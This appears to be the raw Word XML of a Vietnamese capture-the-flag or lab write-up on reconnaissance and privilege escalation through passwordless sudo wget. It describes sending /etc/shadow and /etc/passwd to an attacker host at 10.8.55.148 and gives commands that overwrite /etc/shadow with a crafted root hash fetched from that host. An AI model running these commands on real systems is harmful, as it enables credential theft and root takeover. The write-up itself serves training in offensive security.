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42A72" w14:textId="1DBA9308" w:rsidR="002E2711" w:rsidRDefault="002E271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A7618A" wp14:editId="664F37F7">
            <wp:extent cx="5943600" cy="4551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6BCE" w14:textId="77777777" w:rsidR="002E2711" w:rsidRDefault="002E2711">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C9D0AF" w14:textId="5F3D2843" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF73FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recon thư mục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650B747" w14:textId="77777777" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="5EBAC49A" w14:textId="00CA26E2" w:rsidR="002F49FE" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB">
      <w:r w:rsidRPr="00CF73FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3196D641" wp14:editId="2FDF299E">
            <wp:extent cx="5943600" cy="2278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6F76" w14:textId="1DBAE706" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="263D985D" w14:textId="77777777" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="60BED7A1" w14:textId="14632477" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="3A7AAF10" w14:textId="240AF0B1" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB">
      <w:r w:rsidRPr="00CF73FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123774D1" wp14:editId="643A94A3">
            <wp:extent cx="4372960" cy="295780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5" t="10598" r="19444" b="10086"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4388204" cy="296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08606" w14:textId="2136E547" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="52068DF6" w14:textId="262A0401" w:rsidR="00CF73FB" w:rsidRDefault="00CF73F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Recon file trong sitemap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E86ECF" w14:textId="53EFC9DF" w:rsidR="00CF73FB" w:rsidRDefault="00CF73FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31206593" w14:textId="77777777" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4986BA" w14:textId="18C2647D" w:rsidR="00CF73FB" w:rsidRPr="00CF73FB" w:rsidRDefault="00CF73FB"/>
    <w:p w14:paraId="7495DDDB" w14:textId="16191F85" w:rsidR="00CF73FB" w:rsidRDefault="007A0AC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5513E1D6" wp14:editId="447FCD1C">
            <wp:extent cx="4904004" cy="380689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61" cy="38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FEA4" w14:textId="5867C4CD" w:rsidR="00850B53" w:rsidRDefault="00850B53"/>
    <w:p w14:paraId="1FF5C38B" w14:textId="73547403" w:rsidR="00850B53" w:rsidRDefault="00850B53">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D103A9" wp14:editId="67CB0A3B">
            <wp:extent cx="594360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9D97" w14:textId="0904FB21" w:rsidR="00850B53" w:rsidRDefault="00850B53"/>
    <w:p w14:paraId="1F22E4F3" w14:textId="555E711C" w:rsidR="00850B53" w:rsidRDefault="00861964">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="464F224C" wp14:editId="28A4CD23">
            <wp:extent cx="3619500" cy="272453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r="30770" b="26656"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3619500" cy="272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61E42" w14:textId="71CCFEDA" w:rsidR="003B48FF" w:rsidRDefault="003B48FF"/>
    <w:p w14:paraId="6059D320" w14:textId="71055C0C" w:rsidR="003B48FF" w:rsidRDefault="003B48FF"/>
    <w:p w14:paraId="75A92800" w14:textId="5B224E41" w:rsidR="003B48FF" w:rsidRDefault="003B48FF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77209BEA" wp14:editId="4369163C">
            <wp:extent cx="5479740" cy="222233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12" cy="22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FD09" w14:textId="629831E9" w:rsidR="00081421" w:rsidRDefault="00081421"/>
    <w:p w14:paraId="03BFAA37" w14:textId="666C07A2" w:rsidR="00081421" w:rsidRDefault="00081421">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24ED5DD2" wp14:editId="29622093">
            <wp:extent cx="4876800" cy="104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CA69" w14:textId="13CED0A2" w:rsidR="002E2711" w:rsidRDefault="002E2711"/>
    <w:p w14:paraId="0026962C" w14:textId="4F70113D" w:rsidR="001115F5" w:rsidRDefault="001115F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5E1CE3" wp14:editId="309496F5">
            <wp:extent cx="5943600" cy="1024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4201" w14:textId="2E98AFFB" w:rsidR="001115F5" w:rsidRDefault="001115F5"/>
    <w:p w14:paraId="32A4006F" w14:textId="3F694F30" w:rsidR="001115F5" w:rsidRDefault="001115F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D415A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jessie có thể chạy lệnh sudo wget mà không cần mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460FA94C" w14:textId="61DE9FAD" w:rsidR="00D415A9" w:rsidRDefault="00D415A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A08C3C" w14:textId="450BF589" w:rsidR="00D415A9" w:rsidRDefault="00D415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Để leo thang đặc quyền bằng wget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D76BF9" w14:textId="41561C2E" w:rsidR="00D415A9" w:rsidRDefault="00D415A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F83D9C5" w14:textId="7C8AAE20" w:rsidR="00D415A9" w:rsidRDefault="006F71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Wget khởi tạo lựa chọn post-file để gửi nội dung của file bất kì. Ở đây, ta sẽ dùng wget để truyền file /etc/shadow và /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F470439" w14:textId="1279EFA1" w:rsidR="006F71C8" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEA9CC5" w14:textId="67BFA85A" w:rsidR="006F71C8" w:rsidRDefault="006F71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Wget gửi file đến máy chủ web của kẻ tấn công http:10.8.55.148:80. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA801A" w14:textId="2E014581" w:rsidR="006F71C8" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D43A76" w14:textId="5A30014C" w:rsidR="006F71C8" w:rsidRDefault="006F71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Bạn khởi động máy chủ web bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAEA72F" w14:textId="0D50A978" w:rsidR="006F71C8" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A820994" w14:textId="69604C8D" w:rsidR="006F71C8" w:rsidRDefault="006F71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python3 -m http.server</w:t>
      </w:r>
      <w:r w:rsidR="00AE2F0B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F41D613" w14:textId="0BBE58EB" w:rsidR="006F71C8" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2065E3D3" w14:textId="418B286D" w:rsidR="006F71C8" w:rsidRDefault="006F71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Nhưng vẫn không gửi được vì máy chủ web không hỗ trợ phương thức POST để truyền file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A48726E" w14:textId="6E38D5B1" w:rsidR="006F71C8" w:rsidRDefault="009420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Đây là 1 cách mới để gửi file bằng wget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156ACC62" w14:textId="3D2F806D" w:rsidR="00942077" w:rsidRDefault="00942077">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625EB19C" w14:textId="6E5A0BE3" w:rsidR="00942077" w:rsidRDefault="0094207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0B3EAA" wp14:editId="4CA1983C">
            <wp:extent cx="5943600" cy="80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F85B" w14:textId="0A091197" w:rsidR="00942077" w:rsidRDefault="00942077">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F47772" w14:textId="28E01522" w:rsidR="00942077" w:rsidRDefault="0094207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9B3CF92" wp14:editId="3E8AF55C">
            <wp:extent cx="5943600" cy="105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48C" w14:textId="485EE55E" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B921E10" w14:textId="4743778C" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0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đã có được /etc/shadow và /etc/passwd nhưng không thể crack được mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E20F0" w14:textId="783E35B9" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059FE549" w14:textId="5910D951" w:rsidR="005A64BA" w:rsidRDefault="005A64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 sẽ tạo 1 file shadow mới ở local. Tạo 1 mật khẩu mới cho root ở cục bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DEE6F" w14:textId="72611BBF" w:rsidR="005A64BA" w:rsidRDefault="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12725F4F" w14:textId="193EC9CB" w:rsidR="005A64BA" w:rsidRPr="001B3E63" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openssl passwd -6 -salt 'salt' 'password'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D03409" w14:textId="0668F518" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038F5990" w14:textId="0D6E6316" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64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Sao chép mật khẩu đó vào shadow.txt. Nội dung của file shadow như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBFFAF" w14:textId="38ECBB5C" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636B0E51" w14:textId="18FD299B" w:rsidR="005A64BA" w:rsidRPr="001B3E63" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331DD33" w14:textId="6AFFC8B6" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C3F07D" w14:textId="4ECB8627" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64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Vận chuyển nội dung của file shadow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6627A" w14:textId="515CDA21" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72290EE9" w14:textId="24D581E4" w:rsidR="005A64BA" w:rsidRPr="001B3E63" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4DAED" w14:textId="3FAF7A6F" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F8C0FA" w14:textId="7A549BDE" w:rsidR="005A64BA" w:rsidRDefault="005A64BA" w:rsidP="005A64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Tải file </w:t>
      </w:r>
      <w:r w:rsidR="001B3E63">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đó vào /etc/shadow trong máy ảo từ xa. Để làm được điều này, ta cần chạy nó với đặc quyền root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC9833" w14:textId="01979C72" w:rsidR="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30597291" w14:textId="2BE508C4" w:rsidR="001B3E63" w:rsidRPr="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo wget http://</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.8.55.148</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>000/shadow.txt -O /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E113C" w14:textId="4137EFF5" w:rsidR="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FD5695" w14:textId="5D6F556A" w:rsidR="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64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Cuối cùng, bạn chuyển sang người dùng root với mật khẩu đã tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132CA30B" w14:textId="3277A72D" w:rsidR="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33553C72" w14:textId="18A2535B" w:rsidR="001B3E63" w:rsidRPr="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3E63">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26648E8C" w14:textId="7ABD4515" w:rsidR="001B3E63" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A10279F" w14:textId="77777777" w:rsidR="001B3E63" w:rsidRPr="005A64BA" w:rsidRDefault="001B3E63" w:rsidP="005A64BA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDC89A4" w14:textId="151FE34F" w:rsidR="005A64BA" w:rsidRDefault="001B3E63" w:rsidP="005A64B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601C9A" wp14:editId="7042487C">
            <wp:extent cx="5943600" cy="2827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2A46" w14:textId="77777777" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB9EE76" w14:textId="53FDE3E2" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1C25B9" w14:textId="77777777" w:rsidR="00AE2F0B" w:rsidRDefault="00AE2F0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FC9879" w14:textId="43C9CC01" w:rsidR="00942077" w:rsidRDefault="00942077">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA41EE7" w14:textId="77777777" w:rsidR="00942077" w:rsidRDefault="00942077">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339796A5" w14:textId="597B009F" w:rsidR="006F71C8" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED3C072" w14:textId="77777777" w:rsidR="006F71C8" w:rsidRPr="00D415A9" w:rsidRDefault="006F71C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375A0D22" w14:textId="7BD5429C" w:rsidR="00D415A9" w:rsidRPr="001115F5" w:rsidRDefault="00D415A9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D415A9" w:rsidRPr="001115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FB5"/>
    <w:rsid w:val="00081421"/>
    <w:rsid w:val="001115F5"/>
    <w:rsid w:val="001B3E63"/>
    <w:rsid w:val="002D1FB5"/>
    <w:rsid w:val="002E2711"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003B48FF"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A64BA"/>
    <w:rsid w:val="006F71C8"/>
    <w:rsid w:val="007A0AC7"/>
    <w:rsid w:val="00850B53"/>
    <w:rsid w:val="00861964"/>
    <w:rsid w:val="00942077"/>
    <w:rsid w:val="00AE2F0B"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00CF73FB"/>
    <w:rsid w:val="00D415A9"/>
    <w:rsid w:val="00E5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616F4D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F47DD9CA-D8F1-3A4E-A80E-E0316AD8F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2023-11-07T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>